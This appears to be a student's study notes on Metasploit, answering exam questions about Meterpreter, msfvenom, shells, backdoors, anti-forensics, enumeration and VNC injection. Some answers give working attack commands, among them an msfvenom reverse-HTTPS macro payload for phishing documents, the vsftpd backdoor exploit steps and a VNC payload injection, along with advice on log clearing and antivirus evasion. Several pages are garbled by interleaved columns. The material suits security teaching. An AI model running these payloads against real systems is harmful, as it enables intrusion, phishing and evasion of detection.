Unit 1
1. Illustrate and describe the architecture of the metasploit-framework.
Ans- The architecture of Metasploit consists of various important
components. These components are required to completely use Metasploit
power:
o Tools: These tools are the group of appropriate utilities.
o Plugins: At runtime, plugins are some loadable extensions.
o Interfaces: Interfaces provide users the capability for accessing
Metasploit in so many different ways (web and CLI for instance).
o Libraries: These libraries are appropriate libraries of Ruby.
o Modules: Modules are used to implement specific tasks.
o REX: It handles almost every core function like setting up
formatting, connections, sockets, and other functions.
o MSF CORE: It offers the common API and the original core that
defines the framework.
2. Briefly describe components of metasploit-framework.
Ans:
1. Auxiliaries
• Auxiliaries are the modules that make Metasploit so easy to work with.
A Metasploit auxiliary is nothing but a specific piece of code written to
perform a particular task.
• For example, it can be used to check if we can access an FTP server
anonymously or to check if the webserver is vulnerable to a heart bleed
attack.
• In fact, Metasploit has more than 1,000 auxiliary modules that perform
various tasks like scanning, fuzzing, sniffing, and much more.
2. Payloads
• Payloads in the Metasploit Framework let us decide what action is to be
performed on the target system once the exploit is successful.
• In simple terms, a payload can be defined as the action that needs to be
performed after the complete execution of an exploit.
3. Exploits
• Exploits are an extremely important part of Metasploit.
• The whole purpose of the framework is to offer exploits that you can use
for various vulnerabilities.
• An exploit is a code that takes advantage of a software vulnerability or
security flaw and you will use this code on the target system to take
advantage of the vulnerabilities present in the target system. Metasploit
has more than 1,800 exploits.
4. Encoders
• Metasploit helps you in generating a wide variety of payloads that you
can send to the target in multiple ways to perform any task.
• Encoders use various algorithms and techniques to obscure the payload
in a way that it doesn’t get detected by antivirus software.
1
5. Post-Exploitation Activities (Post)
• Once you have gained access to your target system using any of the
available exploits and here we are talking about basic access, you can
make use of the post modules to further infiltrate the target system.
• With the help of these modules you can perform the following Post-
exploitation activities :
➢ Escalating user privileges to administrator or root.
➢ Retrieving the system credentials
➢ Stealing cookies and saved credentials
➢ Capturing keystrokes on the target system
➢ Executing custom Power Shell scripts for performing
6. NOPs
• In the context of Assembly Language, NOP means No Operation
instruction.
• NOPs can be useful at times while writing exploits or shellcodes.
• Adding NOPs can significantly help in modifying the payload signatures
and thereby avoiding detection.
7. Evasion
• Most of the payloads and shellcodes that are generated from the
Metasploit Framework get detected by anti-virus or other security
software.
• In order to avoid detection, the payloads need to be modified.
• The latest version of the Metasploit Framework offers special evasion
modules that will help modify the payloads to avoid detection
3. What is msfconsole? Why it is preferable over the command-line
interface of MSF?
Ans : The msfconsole is probably the most popular interface to the Metasploit
Framework (MSF).
• It provides an “all-in-one” centralized console and allows you efficient
access to virtually all of the options available in the MSF.
• Msfconsole may seem intimidating at first, but once you learn the syntax
of the commands you will learn to appreciate the power of utilizing this
interface.
Benefits to Using Msfconsole
• It is the only supported way to access most of the features within
Metasploit.
• Provides a console-based interface to the framework
• Contains the most features and is the most stable MSF interface
• Full read line support, tabbing, and command completion
• Execution of external commands in msfconsole is possible
4 What are the datastores in Metasploit-framework? Explain with
example.
▪ The datastore is a core component of the Metasploit Framework. The
datastore is a table of named values that enables you to configure the
behavior of the components within the Metasploit Framework.
▪ The datastore enables the interfaces to configure settings, the payloads to
patch opcodes, and the exploits to define parameters. The datastore also
enables the Metasploit Framework to internally pass options between
modules.
▪ There are two types of datastores:
• Global datastore - To define a global datastore option, use setg. All
modules will be able to use the datastore option.
• Module datastore - To define a module level datastore option, use set.
Only the module that you define the datastore option for can use it.
2
5 Why Ruby is being used during the development of Metasploit-
framework 3.0?
After analyzing a number of programming languages and seriously
considering Python as well as C/C++, the Metasploit team found that Ruby
offered a simple and powerful approach to an interpreted language.
▪ The degree of introspection and the object-oriented aspects of Ruby
fulfilled the requirements of the framework quite well.
▪ The framework needed automated class construction for code re-use,
and Ruby is well suited for this, compared with Perl, which was the
primary programming language used in the 2.x series.
▪ Ruby also offers platform-independent support for threading.This has
resulted in a significant performance improvement over the 2.x series.
▪ When the framework was developed on Perl, the team had to struggle
to get it to work with ActiveState Perl, and ended up settling with
Cygwin, although both resulted in usability issues. The natively
compiled Ruby interpreter for Windows significantly improves
performance and usability.
▪ For these and other reasons, the Metasploit team enjoyed working
best with Ruby, and decided to port the whole framework for the 3.x
series
6 What do you mean by scope and asset prioritization? What should
be included into the scope?
7 Explain msfvenom and it’s features.
• msfvenom is a tool included with the Metasploit framework which
focuses specifically on using the available payloads to generate
executable malware.
• This is a replacement for the former msfpayload and msfencode tools
and is executed by running msfvenom.
• This tool has a number of options available for how to handle the
payload that you’re interested in. By running msfvenom with no
options, you are presented with a help screen.
• msfvenom also has the capability to encode an exploit or payload
replacing Metasploit’s msfencode capability from prior versions.
Features-
- Differentiate between staged VS stageless payloads
- Select a payload and configure its options
- Configure the architecture and OS platform of the payload
- Set the output file and format
- Eliminate bad characters
- Utilise encoders
- Prepend a NOP sled
- Reduce the shellcode length
- Customise shellcode output
8 Explain in brief why there is a need of a penetration testing
framework like Metasploit-framework?
1) Penetration testing is not just about running a set of a few automated tools
against your target.
2) It's a complete process that involves multiple stages, and each stage is
equally important for the success of the project.
3) Now, for performing all tasks throughout all stages of penetration testing,
we would need to use various different tools and might need to perform
some tasks manually.
4) Then, at the end, we would need to combine results from so many
different tools together in order to produce a single meaningful report.
5) This is certainly a daunting task.
6) It would have been really easy and time-saving if one single tool could
have helped us perform all the required tasks for penetration testing.
7) This exact need is satisfied by a framework such as Metasploit.
3
Unit – II
1. What is meterpreter? Explain how it works.
Ans. Meterpreter is an advanced, dynamically extensible payload that uses
in-memory DLL injection stagers and is extended over the network at
runtime. It communicates over the stager socket and provides a
comprehensive client-side Ruby API. It features command history, tab
completion, channels, and more.
How Meterpreter Works-
• The target executes the initial stager. This is usually one of bind, reverse,
findtag, passivex, etc.
• The stager loads the DLL prefixed with Reflective. The Reflective stub
handles the loading/injection of the DLL.
• The Metepreter core initializes, establishes a TLS/1.0 link over the socket
and sends a GET. Metasploit receives this GET and configures the client.
• Lastly, Meterpreter loads extensions. It will always load stdapi and will
load priv if the module gives administrative rights. All of these extensions
are loaded over TLS/1.0 using a TLV protocol.
2. Provide meterpreter design goals.
STEALTHY
• Meterpreter resides entirely in memory and writes nothing to disk.
• No new processes are created as Meterpreter injects itself into the
compromised process and can migrate to other running processes easily.
• By default, Meterpreter uses encrypted communications.
• All of these provide limited forensic evidence and impact on the victim
machine.
POWERFUL
• Meterpreter utilizes a channelized communication system.
• The TLV protocol has few limitations.
EXTENSIBLE
• Features can be augmented at runtime and are loaded over the network.
• New features can be added to Meterpreter without having to rebuild it.
Adding Runtime Features
New features are added to Meterpreter by loading extensions.
• The client uploads the DLL over the socket.
• The server running on the victim loads the DLL in-memory and initializes
it.
• The new extension registers itself with the server.
• The client on the attackers machine loads the local extension API and can
now call the extensions functions.
This entire process is seamless and takes approximately 1 second to complete.
In the next Metasploit Unleashed tutorial we’ll discuss some of the various
Meterpreter Commands available to us in this new environment.
3. Explain the process migration with meterpreter.
• Once you get a meterpreter shell it is important to try and hide the process
in an attempt to gain persistence.
• First of all, make a note of the session number and then background the
meterpreter session by issuing the background command
• Cmd “background”
• Then migrate the meterpreter process to another session. Do this by using
the following Metasploit commands:
• use post/windows/manage/migrate
• msf post(windows/manage/migrate)>set session 1
• msf post(windows/manage/migrate)>run
• This will then automagically spawn a new process such as notepad.exe
and then will bind the meterpreter process to it. This hides the process
from anyone who happens to be looking for anything nefarious in running
processes. It also has the added advantage of making the meterpreter
session much more stable.
4
• You can also try to migrate processes by issuing the ps command,
selecting the process ID or PID of another running process and then
manually attempting to migrate sessions:
• Ps
• Migrate 2288
4. What are the timeout control, sleep control, transport in
meterpreter?
• It is now possible to meticulously control a set of timeout-related
behaviour in Meterpreter sessions. Timeouts may not seem important, but
they change the noise levels of Meterpreter’s communication resiliency
features, and allow for the extension/reduction of time of the Meterpreter
session as a whole.
Meterpreter’s Timeout Values
1. Meterpreter Session Timeout
Each instance of Meterpreter has a lifetime that is defined as a session. The
length of Meterpeter’s life is defined by a parameter called the Session
Timeout. This value can be specified when Meterpreter payloads are
generated by using the SessionExpirationTimeout datastore option. The
default value used is the equivalent of one whole week (604800 seconds), and
hence this is what is used if the user does not override the value manually.
2. Meterpreter Transport Timeouts
Each transport that is configured inside Meterpreter has three timeouts. These
are as follows:
COMMUNICATION TIMEOUT
When Meterpreter talks to Metasploit packets are exchanged at a low level in
a request/response fashion. In the case of TCP transports, this req/rep pattern
is basically instant because TCP is a persistent connection. A request is
handled by Meterpreter, and the response is immediately transferred as soon
as the command has finished executing.
RETRY TOTAL AND RETRY WAIT
After a transport initialises inside Meterpreter, Meterpreter uses this transport
to attempt to establish a new session with Metasploit. In some cases,
Metasploit might not be availalble due to reasons like bad network
connectivity, or a lack of configured listeners. If Meterpreter can’t connect to
Metasploit, it will attempt to retry for a period of time. Once that period of
time expires, Meterpreter will deem this transport “dead” and will move to
the next one in the transport list.
3. Changing Timeouts
Meterpreter supports the querying and updating of each of these timeouts via
the console. In order to get the current timeout settings, users can invoke the
get timeouts command, which returns all four of the current timeout settings
(one for the global session, and three for the transport-specific settings).
5. Write down a Metasploit resource script to automate the process of
multi-handler?
Make a windows payload and migrate it to windows and execute the payload
in windows and get the meterpreter session of the windows target machine.
The multi handler in metasploit is perfect for this situation. Once the module
is selected there are two important settings we want to set after our standard
LHOST and LPORT. The first is to set exitonsession to false, we are
expecting to receive several sessions and do not want the handler to close
after the first one. Next we want to make sure the resource script executes
automatically.
set AutoRunScript multi_console_command -r /root/resource.rc
Finally when we launch the handler we want to give it the -j flag so it runs as
a background job. Now once a meterpreter session is established the
commands we put into the resource file will execute automatically.
5

EXECUTION
Now for the payload itself. Ordinarily for most phishing payloads I default to
Empire, but since we are looking to connect with meterpreter we’ll utilize
msfvenom for our payload generation.
msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.1.1
LPORT=443 -e cmd/powershell_base64 -f vba-psh
The command above will output your macro that will be base64 encoded.
Take it and throw it into a document of your choice. Once we send the phish
all we have to do is wait while users do what they do best, click on links and
download documents. Once the payload is delivered and a connection is
established, our script should execute automatically.
And just like that our shells are coming through and executing the commands
from the resource script without our interaction at all. For the assessment I
used this on it was great to gather all of the user info in order to come back
later and correlate the rest of the phishing data, also I didn’t have to babysit
shells for a week while I could be doing other things.
Unit 3 MSF I
1. Explain buffer overflow attack with its types and impact on the
system.
Buffer Overflow Attack
• When a lot of data is written to a buffer than it can hold, a buffer overflow
occurs.
• Buffer overflows are one of the deadliest vulnerabilities an attacker may
exploit, partly because they are challenging to detect and fix.
• Attackers can take advantage of buffer overflows to corrupt software.
• A buffer overflow vulnerability occurs when you give a program too
much data. The excess data corrupts nearby space in memory and may
alter other data.
• As a result, the program might report an error or behave differently. Such
vulnerabilities are also called buffer overrun.
• However, buffer overflow attacks may have very serious consequences.
Such attacks often let the attacker gain shell access and therefore full
control of the operating system.
• Even if the attacker cannot gain shell access, buffer overflow attacks may
stop running programs and, as a result, cause a Denial of Service.
Types
There are two primary types of buffer overflow vulnerabilities: stack
overflow and heap overflow.
- In the case of stack buffer overflows, the issue applies to the stack, which
is the memory space used by the operating system primarily to store local
variables and function return addresses. The data on the stack is stored
and retrieved in an organized fashion (last-in-first-out), the stack
6
 allocation is managed by the operating system, and access to the stack is Generally, transmit information Generally, transmit information
fast. through an ID Token. through an Access Token.
- In the case of heap buffer overflows, the issue applies to the heap, which
The user authentication is visible The user authorization is not visible
is the memory space used to store dynamic data. The amount of memory
at user end. at the user end.
that needs to be reserved is decided at runtime and it is managed by the Example: Employees in a Example: After an employee
program, not the operating system. Access to the heap is slower but the company are required to successfully authenticates, the system
space on the heap is only limited by the size of virtual memory. authenticate through the network determines what information the
• Buffer overflows can affect all types of software. before accessing their company employees are allowed to access.
• They typically result from malformed inputs or failure to allocate email.
enough space for the buffer.
• If the transaction overwrites executable code, it can cause the program 3. What do you mean by maintaining access and anonymity?
to behave unpredictably and generate incorrect results, memory
access errors, or crashes. • Maintaining access and anonymity are steps included in the post
exploitation phase of penetration testing.
Maintaining access:
2. Provide difference between authentication and authorization.
- Once access into the system is obtained, it must be maintained.
Authentication Authorization
- This can be achieved by planting backdoors on the target system,
In the authentication process, the While in authorization process, the which allows an attacker to gain repeated access as required.
identity of users is checked for person’s or user’s authorities are - After successfully compromising a host, if the rules of engagement
providing the access to the checked for accessing the resources. permit it, it is frequently a good idea to ensure that you will be able to
system. maintain your access for further examination or penetration of the
target network.
In the authentication process, While in this process, users or persons
- This also ensures that you will be able to reconnect to your victim if
users or persons are verified. are validated.
you are using a one-off exploit or crash a service on the target. In
It is done before the authorization While this process is done after the situations like these, you may not be able to regain access again until
process. authentication process. a reboot of the target is performed.
- Once you have gained access to one system, you can ultimately gain
It usually needs the user’s login While it needs the user’s privilege or
access to the systems that share the same subnet.
details. security levels.
- “Maintaining Access” is a phase of the pentest cycle which has a very
Authentication determines While it determines What concrete purpose – to allow the pentester to linger in the targeted
whether the person is user or not. permission does the user have? systems until he acquires what information he considers to be
valuable and then manages to extract it successfully from the system.
7
Maintaining anonymity:
- An attacker should not leave any sign of intrusion on the target.
- This would involve clearing of logs, disabling prevalent monitors, and
so on.
- Also, as a law enforcement agent, it is advisable that you maintain
anonymity throughout your command-and-control sessions.
- Another area that sophisticated hackers concentrate on is to hide any
evidence that they have infiltrated a computer or system.
- In fact, if they can successfully hide their presence and delete malware
as they depart, an attack might never be detected.
4. What is backdoor? Explain with practical example.
Backdoor –
• The backdoor is any sort of method which allows any hacker to access
your system without your permission.
• A Backdoor can be installed on your system by hackers in the form of
some malware application or using your device’s software vulnerabilities.
• Backdoors are used mainly by hackers for using your data, invading your
privacy, surveillance, etc.
Example: VSFTPD (Backdoor command execution)
- Open, a Kali Linux VM and the Metasploitable 2 VM.
- Log into the metasploitable 2 VM and run ifconfig. Log down the IP
address for later use.
- On the Kali machine run the command, msfconsole. Once loaded give the
command, search vsftpd 2.3.4.
- Using the last exploit listed, select said exploit with command,
- use exploit/unix/ftp/vsftpd_234_backdoor.
- The command, info, will provide intel on the exploit. Run the command,
show options, to see what is missing from running this exploit. RHOSTS
is missing.
- Using the IP address logged earlier from the Metasploitable 2 VM, run
the command, set rhosts “IP address from Metasploitable 2”.
- Run the show options command to make sure the IP matches the
Metasploitable 2 VM. If so, run the command exploit.
- Now you should see a Command Shell Session opened between
BackTrack to Metasploitable.
- Use meterpreter commands like whoami, hostname.
5. What is shell? Describe the types of shell.
Shell
• A Meterpreter shell gives you access to Metasploit modules and other
actions not available in the command shell.
• A shell session opens a standard terminal on the target host, giving
you similar functions to a terminal on your OS.
• The functionality can differ depending on the type of exploit used.
Using a shell does not provide the same actions as a Meterpreter shell.
• The Shell session page provides you with the following information:
- Session - Session number and target host address.
- Session Type - The type of payload and module used to open the
session.
- Information - Any information on how the session was opened. If this
was the result of a bruteforce attack it will include the authentication
type and credential pair used.
Types
1. Bind Shell
- A bind shell is set up on the target host and binds to a specific port
to listens for an incoming connection from the attack box.
- Bind shells have the listener running on the target and the attacker
connect to the listener to gain a remote shell.
- A Bind Shell is like a setup where remote consoles are established
with other computers over the network.
- In a bind shell, an attacker can connect to the target computer and
execute commands on the target computer.
- To launch a bind shell, the attacker must have the IP address of
the victim to access the target computer.
8
2. Reverse Shell
- A reverse shell is a shell initiated from the target host back to the
attack box which is in a listening state to pick up the shell.
- Reverse shells have the listener running on the attacker and
the target connects to the attacker with a shell.
- A Reverse Shell is like a setup, where the attacker must first start
the server on his machine, while the target machine will have to
act as a client that connects to the server served by the attacker.
- After the successful connection, the attacker can gain access to
the shell of the target computer.
- To launch a Reverse shell, the attacker doesn’t need to know the
IP address of the victim to access the target computer.
6. What is Metasploit anti-forensic toolkit?
• Metasploit antiforensics investigation kit includes tools like
timestomp, slacker, transmogrify, and sam juicer.
• These anti-forensic tools are developed by the MAFIA
(Metasploit Anti-Forensic Investigation Arsenal).
1. Timestomp
- can be used to modify the file attributes.
- allows you to delete or modify all four New Technology File System
(NTFS) timestamp values: Modified, Accessed, Created and Entry
Modified.
2. Transmogrify
- can be used to change the file signatures like changing the file extension.
- First ever tool to defeat EnCase's file signaturing capabilities by allowing
you to mask and unmask your files as any file type.
3. Sam juicer
- an advanced tool to help attackers to prevent evidence from being
created.
- The Sam Juicer runs over a memory/LSASS channel to dump password
hashes on a Windows system without leaving any sort of trace or
signature on the disk or registry.
- A Meterpreter module that dumps the hashes from the SAM, but does it
without ever hitting disk.
4. Slacker
- can be used to hide file data within the slack space of FAT or NTFS.
- This slack space is created when a file system allocates space for a file
to be written, it will typically allocate more space than it actually uses.
- The unused space is called slack space and perfect data-hiding grounds
for the hacker.
9
UNIT 4 2. Provide difference between brute force and dictionary attack.
1. Describe exploit and its types.

Ans. An exploit or weakness is a piece of programming, information, or

succession of orders that exploits a weakness to cause accidental conduct or
to acquire unapproved admittance to delicate details. Whenever these
weaknesses are recognized, they are posted on Common Vulnerabilities and
Exposures (CVE). CVE is a free exploit word reference intended to work on
worldwide network protection and digital flexibility by making a normalized
identifier for a given weakness or openness.

There are two principal classes of exploits found in the present digital local
area. They are known as known weaknesses and zero-day weaknesses.

Known weaknesses: These take advantage of safety scientists know about

and have archived. It utilizes the target's realized weaknesses and is regularly
fixed yet stays a suitable danger due to slow fixing.

Zero-day Exploits: These are weaknesses people have accounted for in the
general population or recorded on CVE. This implies cybercriminals have
observed the exploits before engineers have had the option to fix them, and
some designers may not know about the weakness. 3. What is enumeration? Give example of enumeration modules in
Metasploit framework?

Ans. Enumeration is defined as the process of extracting user names, machine

names, network resources, shares and services from a system. In this phase,
the attacker creates an active connection to the system and performs directed
queries to gain more information about the target. The gathered information
is used to identify the vulnerabilities or weak points in system security and
tries to exploit in the System gaining phase.

10
Types of information enumerated by intruders:
• Network Resource and shares
• Users and Groups
• Routing tables
• Auditing and Service settings
• Machine names
• Applications and banners
• SNMP and DNS details
Techniques for Enumeration:
• Hashdump
• Usb_history
• Local_exploit_suggestor
4. What SSL certificate? How you can enumerate SSL certificate using
auxiliary module?
Ans. An SSL certificate is a digital certificate that authenticates a website's
identity and enables an encrypted connection. SSL stands for Secure Sockets
Layer, a security protocol that creates an encrypted link between a web server
and a web browser.

• Extracting user names using email ID's Companies and organizations need to add SSL certificates to their websites
• Extract information using the default password to secure online transactions and keep customer information private and
secure.
• Brute Force Active Directory
• Extract user names using SNMP In short: SSL keeps internet connections secure and prevents criminals from
• Extract user groups from Windows reading or modifying information transferred between two systems. When
• Extract information using DNS Zone transfer you see a padlock icon next to the URL in the address bar, that means SSL
protects the website you are visiting.
Modules in Metasploit Framework
Why do we need SSL Certificate?
• Auxiliaries
• POST Exploitation Websites need SSL certificates to keep user data secure, verify ownership of
• Meterpreter the website, prevent attackers from creating a fake version of the site, and
• Arp_scanner convey trust to users.
• Checkvm
• Credential_collector If a website is asking users to sign in, enter personal details such as their
credit card numbers, or view confidential information such as health benefits
• Dumplinks
or financial information, then it is essential to keep the data confidential. SSL
• Enum_applications
certificates help keep online interactions private and assure users that the
• Enum_logged_on_users
website is authentic and safe to share private information with.
• Enum_shares
• Enum_snmp How you can enumerate SSL certificate using auxiliary module?

11
Name: HTTP SSL Certificate Checker is installed on the device you want to control from. This can include another
Module: auxiliary/scanner/http/cert computer, a tablet, or a mobile phone. When the server and viewer are
Source code: modules/auxiliary/scanner/http/cert.rb connected, the server transmits a copy of the remote computer’s screen to the
Disclosure date: - viewer.
Last modification time: 2017-07-24 06:26:21 +0000
Supported architecture(s): - Process of VNC injection in windows machine.
Supported platform(s): -
While taking control over our victim’s PC, often due to security
Target service / protocol: -
measures some of our commands do not work such as run vnc and so, we
Target network port(s): 443
might come across such error:
List of CVEs: -

This module will check the certificate of the specified web servers to ensure
the subject and issuer match the supplied pattern and that the certificate is not
expired.
msf > use auxiliary/scanner/http/cert
msf auxiliary(cert) > show options
... show and set options ... In such a case, there is a special payload, especially for vnc. Whenever you
msf auxiliary(cert) > set RHOSTS ip-range face such problem use following exploit:

msf auxiliary(cert) > exploit use windows/manage/payload_inject

msf exploit (payload_inject)>set payload windows/vncinject/reverse_tcp
5. Explain VNC and also elaborate step by step process of VNC injection msf exploit (payload_inject)>set lhost 192.168.1.109
in windows machine. msf exploit (payload_inject)>set session 1
msf exploit (payload_inject)>set handler true
Ans. VNC stands for Virtual Network Computing. It is a cross-platform msf exploit (payload_inject)>exploit
screen sharing system that was created to remotely control another computer.
This means that a computer’s screen, keyboard, and mouse can be used from
a distance by a remote user from a secondary device as though they were
sitting right in front of it.

VNC works on a client/server model. A server component is installed on the

remote computer (the one you want to control), and a VNC viewer, or client,
12
13